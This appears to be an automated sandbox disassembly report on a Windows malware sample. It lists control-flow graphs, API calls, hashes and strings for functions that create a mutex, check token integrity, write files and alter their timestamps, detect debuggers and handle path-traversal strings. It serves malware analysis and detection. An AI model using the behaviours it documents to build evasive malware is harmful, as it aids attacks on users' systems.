181->169 183->172 184->170 184->183 189 c86dc4-c86dc9 call c87097 186->189 190 c86bd4-c86be9 186->190 188 c86c00-c86c23 call c827b0 187->188 202 c86c43-c86c79 call c86830 CreateFileW 188->202 192 c86beb-c86bef 190->192 193 c86c25-c86c41 call c827b0 190->193 192->193 197 c86bf1-c86bf4 192->197 193->202 197->188 201 c86bf6-c86bfe 197->201 201->188 201->193 206 c86c7b-c86c90 call c86f60 202->206 207 c86c93-c86ca7 call c85b70 202->207 212 c86ca9-c86cb6 call c871b0 207->212 213 c86cbc-c86cbe 207->213 212->213 215 c86cc0-c86ce1 call c85d40 213->215 219 c86d23 215->219 220 c86ce3-c86ce5 215->220 221 c86d28-c86d2c 219->221 222 c86d15-c86d1a 220->222 223 c86ce7 220->223 224 c86d2e-c86d33 221->224 225 c86d6f-c86d71 221->225 222->221 226 c86d09-c86d0f 223->226 227 c86ce9-c86d07 WriteFile 223->227 224->225 230 c86d35-c86d39 224->230 228 c86da1-c86dc1 CloseHandle call c86f60 225->228 229 c86d73-c86d96 SetFileTime CloseHandle 225->229 226->221 232 c86d11-c86d13 226->232 227->226 231 c86d1c-c86d21 227->231 229->228 234 c86d3b-c86d41 call c8c52b 230->234 235 c86d44-c86d4e 230->235 231->221 232->215 232->222 234->235 238 c86d58-c86d68 call c8c52b 235->238 239 c86d50-c86d53 call c847e0 235->239 238->225 239->238
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00C86C6A
                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86CFF
                                                        • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86D8F
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86D96
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86DA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateTimeWrite
                                                        • String ID: %s%s$%s%s%s$:
                                                        • API String ID: 3400595745-3034790606
                                                        • Opcode ID: ef23ef95af1e0f2e443e92f8250e99d50b1d26a1ad64e1425c8d87c097d4c4df
                                                        • Instruction ID: aedb140a2ed7a29af89b41f7f11a3188789aa088325753665a9d1c0d22d3d352
                                                        • Opcode Fuzzy Hash: ef23ef95af1e0f2e443e92f8250e99d50b1d26a1ad64e1425c8d87c097d4c4df
                                                        • Instruction Fuzzy Hash: 2BB1E7716006149BDB34FF64DC85BEAB3B4FF04318F10056EE96A97281E770AE94DB98
                                                        Function 00C86830 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 244 c86830-c8684b 245 c868d1-c868d7 244->245 246 c86851-c8686f call c8a23b 244->246 248 c868dd-c868e2 245->248 249 c869c1-c869d0 call c86f60 245->249 255 c86870-c86879 246->255 252 c868e4-c868e8 248->252 253 c868ea-c868ee 252->253 254 c868f0 252->254 253->254 257 c868f2-c868fe 253->257 254->257 255->255 258 c8687b-c8687f 255->258 257->252 259 c86900-c86902 257->259 260 c868b0-c868c0 GetFileAttributesW 258->260 261 c86881-c8688c 258->261 262 c8693d-c86949 259->262 263 c86904-c86920 call c89c70 259->263 260->245 266 c868c2-c868cb CreateDirectoryW 260->266 264 c8688e-c86891 261->264 265 c86893-c868a0 261->265 268 c8694b-c8695d call c8a23b 262->268 269 c86960-c8696f 262->269 270 c869d1-c869ff call c87097 263->270 276 c86926-c86938 call c86830 263->276 264->260 264->265 265->270 271 c868a6-c868a8 265->271 266->245 268->269 275 c86970-c86979 269->275 284 c86a01-c86a0b 270->284 285 c86a54-c86a63 270->285 271->260 275->275 279 c8697b-c869b0 call c8a23b GetFileAttributesW 275->279 276->262 279->249 286 c869b2-c869bb CreateDirectoryW 279->286 284->285 289 c86a0d-c86a12 284->289 287 c86a7d-c86a80 285->287 288 c86a65-c86a7a call c86f60 285->288 286->249 291 c86ab8-c86abd 287->291 292 c86a82-c86a84 287->292 289->285 293 c86a14-c86a18 289->293 294 c86abf 291->294 295 c86b13-c86b30 call c86120 291->295 292->291 297 c86a86-c86ab5 call c85540 292->297 298 c86a1a-c86a20 call c8c52b 293->298 299 c86a23-c86a2d 293->299 300 c86ac0-c86ac2 294->300 315 c86b6e-c86b7e 295->315 316 c86b32-c86b35 295->316 297->291 298->299 301 c86a2f-c86a32 call c847e0 299->301 302 c86a37-c86a4d call c8c52b 299->302 306 c86b0c-c86b11 300->306 307 c86ac4-c86ac8 300->307 301->302 302->285 306->295 306->300 307->306 313 c86aca-c86ad1 307->313 313->306 317 c86ad3-c86b09 call c85540 313->317 318 c86b9e-c86bb5 call c8a23b 315->318 319 c86b80-c86b84 315->319 320 c86b50 316->320 321 c86b37-c86b3a 316->321 317->306 336 c86bc2-c86bce 318->336 337 c86bb7-c86bc0 318->337 324 c86b91-c86b94 319->324 325 c86b86-c86b8a 319->325 322 c86b52-c86b6b call c86830 call c86f60 320->322 321->320 327 c86b3c-c86b3f 321->327 331 c86b96-c86b9c 324->331 325->324 330 c86b8c-c86b8f 325->330 333 c86b48-c86b4e 327->333 334 c86b41-c86b46 327->334 330->331 331->318 331->319 333->322 334->320 334->333 339 c86dc4-c86dc9 call c87097 336->339 340 c86bd4-c86be9 336->340 338 c86c00-c86c23 call c827b0 337->338 352 c86c43-c86c79 call c86830 CreateFileW 338->352 342 c86beb-c86bef 340->342 343 c86c25-c86c41 call c827b0 340->343 342->343 347 c86bf1-c86bf4 342->347 343->352 347->338 351 c86bf6-c86bfe 347->351 351->338 351->343 356 c86c7b-c86c90 call c86f60 352->356 357 c86c93-c86ca7 call c85b70 352->357 362 c86ca9-c86cb6 call c871b0 357->362 363 c86cbc-c86cbe 357->363 362->363 365 c86cc0-c86ce1 call c85d40 363->365 369 c86d23 365->369 370 c86ce3-c86ce5 365->370 371 c86d28-c86d2c 369->371 372 c86d15-c86d1a 370->372 373 c86ce7 370->373 374 c86d2e-c86d33 371->374 375 c86d6f-c86d71 371->375 372->371 376 c86d09-c86d0f 373->376 377 c86ce9-c86d07 WriteFile 373->377 374->375 380 c86d35-c86d39 374->380 378 c86da1-c86dc1 CloseHandle call c86f60 375->378 379 c86d73-c86d96 SetFileTime CloseHandle 375->379 376->371 382 c86d11-c86d13 376->382 377->376 381 c86d1c-c86d21 377->381 379->378 384 c86d3b-c86d41 call c8c52b 380->384 385 c86d44-c86d4e 380->385 381->371 382->365 382->372 384->385 388 c86d58-c86d68 call c8c52b 385->388 389 c86d50-c86d53 call c847e0 385->389 388->375 389->388
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 00C868B7
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00C868CB
                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 00C869A7
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00C869BB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AttributesCreateDirectoryFile
                                                        • String ID:
                                                        • API String ID: 3401506121-0
                                                        • Opcode ID: 24cac2fe1843fcc1d59e70014a3f6dac8bead21dfb5a378f92c56ac8a5249e52
                                                        • Instruction ID: b91a41e23a9c9544103707d87c638511370ce6b94fe4c5d8e91b92104e3f8d66
                                                        • Opcode Fuzzy Hash: 24cac2fe1843fcc1d59e70014a3f6dac8bead21dfb5a378f92c56ac8a5249e52
                                                        • Instruction Fuzzy Hash: 1E5107719002189BCB24FF78D885BEAB3B8EF44318F14466AE929D71C1EB319E55CB58
                                                        Function 00C82710 Relevance: 4.6, APIs: 3, Instructions: 53synchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 394 c82710-c82727 call c81000 397 c82729-c82742 CreateMutexW GetLastError 394->397 398 c82785-c82788 394->398 399 c8277d-c8277f ExitProcess 397->399 400 c82744-c82749 397->400 401 c8274b-c82752 call c824b0 400->401 402 c82754-c82765 call c81420 400->402 401->402 407 c8278b-c82790 call c82520 401->407 406 c8276a-c82772 402->406 406->399 408 c82774-c82778 call c81860 406->408 408->399
                                                        APIs
                                                          • Part of subcall function 00C81000: lstrcmpA.KERNEL32(00000000,?), ref: 00C810A2
                                                          • Part of subcall function 00C81000: GetProcessHeap.KERNEL32(00000008,?), ref: 00C810C7
                                                          • Part of subcall function 00C81000: HeapAlloc.KERNEL32(00000000), ref: 00C810CE
                                                          • Part of subcall function 00C81000: lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 00C810EC
                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00C82731
                                                        • GetLastError.KERNEL32 ref: 00C82737
                                                        • ExitProcess.KERNEL32 ref: 00C8277F
                                                          • Part of subcall function 00C824B0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00C824CC
                                                          • Part of subcall function 00C824B0: OpenProcessToken.ADVAPI32(00000000), ref: 00C824D3
                                                          • Part of subcall function 00C824B0: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00C824F3
                                                          • Part of subcall function 00C824B0: CloseHandle.KERNEL32(?), ref: 00C82502
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Process$HeapToken$AllocCloseCreateCurrentErrorExitHandleInformationLastMutexOpenlstrcmplstrlen
                                                        • String ID:
                                                        • API String ID: 2480484397-0
                                                        • Opcode ID: 95a2a41cb1062874d5cd3478c4397b61a0fb01b0396995c6c4d1f0a67054e12b
                                                        • Instruction ID: e338a9f2ea0afe861962d36ded53f1eb462d492591d0ff06ea77cc498f862623
                                                        • Opcode Fuzzy Hash: 95a2a41cb1062874d5cd3478c4397b61a0fb01b0396995c6c4d1f0a67054e12b
                                                        • Instruction Fuzzy Hash: 9101AD301083059FDB14BB55DC0EB2DB7E5EB84349F148A2DF9B4410E1EB308954EBAB
                                                        Function 00C8DC45 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 412 c8dc45-c8dc4e 413 c8dc7d-c8dc7e 412->413 414 c8dc50-c8dc63 RtlFreeHeap 412->414 414->413 415 c8dc65-c8dc7c GetLastError call c8dbb8 call c8dc32 414->415 415->413
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00C90BB6,?,00000000,?,?,00C90BDB,?,00000007,?,?,00C91029,?,?), ref: 00C8DC5B
                                                        • GetLastError.KERNEL32(?,?,00C90BB6,?,00000000,?,?,00C90BDB,?,00000007,?,?,00C91029,?,?), ref: 00C8DC66
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 485612231-0
                                                        • Opcode ID: 53212b4edc6f0539c86119ef9353bbe09c03901274be05792078adf28cf7e38c
                                                        • Instruction ID: 6ecd1fa4c4addb958113c20cfaa1ea20ae5c3453336def2d16df2a2458cb4684
                                                        • Opcode Fuzzy Hash: 53212b4edc6f0539c86119ef9353bbe09c03901274be05792078adf28cf7e38c
                                                        • Instruction Fuzzy Hash: 7DE08C32140218ABCF113BA8AD0DF993BA8EB09399F504025F6198A0A0CB70C940CB98
                                                        Function 00C8DC7F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 420 c8dc7f-c8dc8b 421 c8dcbd-c8dcc8 call c8dc32 420->421 422 c8dc8d-c8dc8f 420->422 429 c8dcca-c8dccc 421->429 423 c8dca8-c8dcb9 RtlAllocateHeap 422->423 424 c8dc91-c8dc92 422->424 426 c8dcbb 423->426 427 c8dc94-c8dc9b call c8d247 423->427 424->423 426->429 427->421 432 c8dc9d-c8dca6 call c8c57b 427->432 432->421 432->423
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00C8718C,00000000,?,00C86E07,0000044C,CA1DECC3,771AF380,00000000,00000000,000000FF,?,00C814D5), ref: 00C8DCB1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 5371f2af1d0d50e689f5e6eb44a3602c0fb72e3549a6e38a543c244be8908e00
                                                        • Instruction ID: 9adfbbcae7f68fe92ced24c0d21d43b0dbfc06d02ca15d77f82c77ac5c459b7c
                                                        • Opcode Fuzzy Hash: 5371f2af1d0d50e689f5e6eb44a3602c0fb72e3549a6e38a543c244be8908e00
                                                        • Instruction Fuzzy Hash: 46E06D3164422067DB21376AAC04B5A7B48AF427B8F150161EC27961D0CBA0DE01D3AD

                                                        Non-executed Functions

                                                        Function 00C86120 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 518COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /../$/..\$\../$\..\
                                                        • API String ID: 0-3885502717
                                                        • Opcode ID: 5080549309a826ca9b32cdc4d2358fb441fa955f9b99f6da77138be75d9720cf
                                                        • Instruction ID: cd427be990fb9f2ddf34e7a5dae3a839f2a7ee4b9b9daebba8eb3e0d3895db52
                                                        • Opcode Fuzzy Hash: 5080549309a826ca9b32cdc4d2358fb441fa955f9b99f6da77138be75d9720cf
                                                        • Instruction Fuzzy Hash: 9312E371A006148BCB25DF24C8857AABBF5EF44318F1842EDE85D9B392D731AB45CF94
                                                        Function 00C927EB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 35942fda2d49ed9c0cef35717af70fc9b909b20db9452429e8638ac11cf907dd
                                                        • Instruction ID: 78e568b67073be54a90014ca029ae6799c3a9a957232aaef278a7f2bd52564dd
                                                        • Opcode Fuzzy Hash: 35942fda2d49ed9c0cef35717af70fc9b909b20db9452429e8638ac11cf907dd
                                                        • Instruction Fuzzy Hash: DFD22572E086689FDF65CE28CD487EAB7B5EB44305F1401EAD44DA7240EB78AF818F41
                                                        Function 00C92340 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                        • Instruction ID: 69068c09d87a8bb5b83d7fa88df7c0911154504af13fd9a1f758e137b33028cb
                                                        • Opcode Fuzzy Hash: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                        • Instruction Fuzzy Hash: 3E024C71E01219ABDF14CFA9C884AAEBBF1FF48314F258269E555E7340D731AA45CB90
                                                        Function 00C87884 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C87890
                                                        • IsDebuggerPresent.KERNEL32 ref: 00C8795C
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C87975
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00C8797F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: 451c5e7f2acb5c22961530c995f0f115759d4593bd8b6380b0fca793ef7b1569
                                                        • Instruction ID: f855e34060a5809ab4e256dea95f7080d0542b9722880a9cbac48e2c67720f3c
                                                        • Opcode Fuzzy Hash: 451c5e7f2acb5c22961530c995f0f115759d4593bd8b6380b0fca793ef7b1569
                                                        • Instruction Fuzzy Hash: 1531D775D052189BDF21EFA4D949BCDBBB8AF08304F1051AAE40CAB290EB759B84DF45
                                                        Function 00C8D978 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C8DA70
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C8DA7A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C8DA87
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: c8287e02865636defeccb73ba546a52c4d924b01239b62fdc56276ce998496aa
                                                        • Instruction ID: f245f40c2c9733c2535a657d600432c7ad393f427d12af05bfd90bca9fd191fb
                                                        • Opcode Fuzzy Hash: c8287e02865636defeccb73ba546a52c4d924b01239b62fdc56276ce998496aa
                                                        • Instruction Fuzzy Hash: A231C9749012189BCB21EF68DD897DCB7B8BF08314F6041EAE41CA7291E7709F859F44
                                                        Function 00C85D40 Relevance: 3.3, APIs: 2, Instructions: 326fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000,00000000), ref: 00C85E1C
                                                        • ReadFile.KERNEL32(FFFFFFFF,?,00004000,00004000,00000000,00000000), ref: 00C85E40
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: File$PointerRead
                                                        • String ID:
                                                        • API String ID: 3154509469-0
                                                        • Opcode ID: 7f97d38b8a99a91e9ee250de9d79a8127270691bb4012db4acc844fe6a45e00f
                                                        • Instruction ID: 2d6a3554a3f9c3a894d1a36867ba48be091c08b2cd4f9036b4c76540beafa0e0
                                                        • Opcode Fuzzy Hash: 7f97d38b8a99a91e9ee250de9d79a8127270691bb4012db4acc844fe6a45e00f
                                                        • Instruction Fuzzy Hash: CCC19C31A00B058FCB24DFAAD8806AAB7F2FF84308F14856ED59697751CB71EE45CB94
                                                        Function 00C97867 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C97862,?,?,00000008,?,?,00C97465,00000000), ref: 00C97A94
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: 1c4d6c85be73f7c1eafb0ac6f063230846a80e98fb9b26cd0ba6b7c5b9204603
                                                        • Instruction ID: a3b979e9a4d30e82bc3066ea62df340dbbf2eaa22dd1b43aee53acbaaf5a59ad
                                                        • Opcode Fuzzy Hash: 1c4d6c85be73f7c1eafb0ac6f063230846a80e98fb9b26cd0ba6b7c5b9204603
                                                        • Instruction Fuzzy Hash: F4B17F31625609DFDB19CF28C48AB657BE0FF45364F298658E8E9CF2A1C335DA91CB40
                                                        Function 00C87B48 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C87B5E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-0
                                                        • Opcode ID: c7b3d1239058d30a9726ad8301fdc2e12c73c5b5361111a7545b69fab14240e6
                                                        • Instruction ID: 8bc63d4a7b9a9201df5ee0331a44b10cf8e8e8a49734980ac320c1a05963d0d1
                                                        • Opcode Fuzzy Hash: c7b3d1239058d30a9726ad8301fdc2e12c73c5b5361111a7545b69fab14240e6
                                                        • Instruction Fuzzy Hash: 9D518FB1A042158FEB19CF69D8857AEBBF1FB49318F24862AD415EB250E774DE40CF60
                                                        Function 00C8BAFC Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
